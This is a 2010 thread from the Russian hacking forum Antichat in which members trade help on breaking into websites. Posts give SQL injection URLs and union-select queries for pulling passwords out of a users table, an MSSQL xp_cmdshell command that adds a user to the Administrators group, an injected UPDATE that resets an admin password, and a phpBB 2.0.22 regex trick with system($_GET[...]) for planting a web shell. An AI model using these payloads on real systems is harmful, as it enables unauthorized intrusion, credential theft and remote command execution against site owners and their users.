HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 30.04.2010, 14:26
pinch
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами: 8638130

Репутация: 54
По умолчанию

в mssql если имя пользователя не sa при запросе:

http://test/news.asp?id=1+or+1=(select+system_user)--

то как я понимаю у меня не будет прав на выполнения команд?
 
Ответить с цитированием

  #2  
Старый 30.04.2010, 14:52
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами: 8866466

Репутация: 564
По умолчанию

2pinch нет от этого не зависеть
если есть права то кмдшелл то добавь сам админа EXEC xp_cmdshell 'net localgroup Administrators test_user /add'
в твоем случае можешь поменять пароль от админа (ну если превелегии есть)
?id=1; UPDATE 'admin_login' SET 'password' = 'password' WHERE login_name='sa--

Последний раз редактировалось shell_c0de; 30.04.2010 в 14:56..
 
Ответить с цитированием

  #3  
Старый 30.04.2010, 17:25
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию

Как в phpBB 2.0.22 обойти usercp_avatar.php ??
не получаеться залить шел через аватарку. видно стоит обработка скриптом!

Или что можно воткнут в место phpinfo()
в
UPDATE phpbb_users SET user_sig_bbcode_uid='(.+)/e\0', user_sig='phpbbhpinfo()' WHERE user_id=4;

штоб шел залить??

Последний раз редактировалось GOGA075; 30.04.2010 в 18:17..
 
Ответить с цитированием

  #4  
Старый 30.04.2010, 19:13
budden
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
С нами: 9364549

Репутация: 184
По умолчанию

вставляй system($_GET[tu4ka])
 
Ответить с цитированием

  #5  
Старый 30.04.2010, 22:19
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

есть таблица users

table_rows - 6

есть колонки name,pass

когда делаю запрос union+select+......version()+from+users то все нормально

а запрос union+select+......pass+from+users ничего не выдает

что посоветуете?
 
Ответить с цитированием

  #6  
Старый 30.04.2010, 22:35
GOGA075
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
С нами: 9534473

Репутация: 18
По умолчанию

Konqi, попробуй shar() либо concat_ws()
 
Ответить с цитированием

  #7  
Старый 30.04.2010, 22:39
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от GOGA075  
Konqi, попробуй shar() либо concat_ws()
чаром нельзя,а конкат не че не может изменить ибо это функция для соединения результатов,не больше.
 
Ответить с цитированием

  #8  
Старый 30.04.2010, 22:36
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
С нами: 10585560

Репутация: 1550


По умолчанию

Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users

count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?

Последний раз редактировалось Gorev; 30.04.2010 в 22:40..
 
Ответить с цитированием

  #9  
Старый 30.04.2010, 22:41
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами: 8885780

Репутация: 672


По умолчанию

Цитата:
Сообщение от Gorev  
Konqi проверь если не пустая табла
union+select+1,2,count(*),4+from+users

count(*) выводит количество записей в таблице, если вывело 0, таблица пустая
либо для 5 ветки так
union+select+1,table_rows+from+information_schema. tables+where+table_name='users'
и если табла в нужной базe
union+select+1,2,pass,4+from+database_name.users
hex(unhex())
aes_encrypt....
GOGA075
concat обьеденяет запросы..причем тут конкатирование?
count(*) выдает 4
 
Ответить с цитированием

  #10  
Старый 30.04.2010, 22:45
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
С нами: 8603287

Репутация: 87
По умолчанию

Цитата:
Сообщение от Konqi  
count(*) выдает 4
узнай в какой базе таблица users... потом from+*base*.users
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.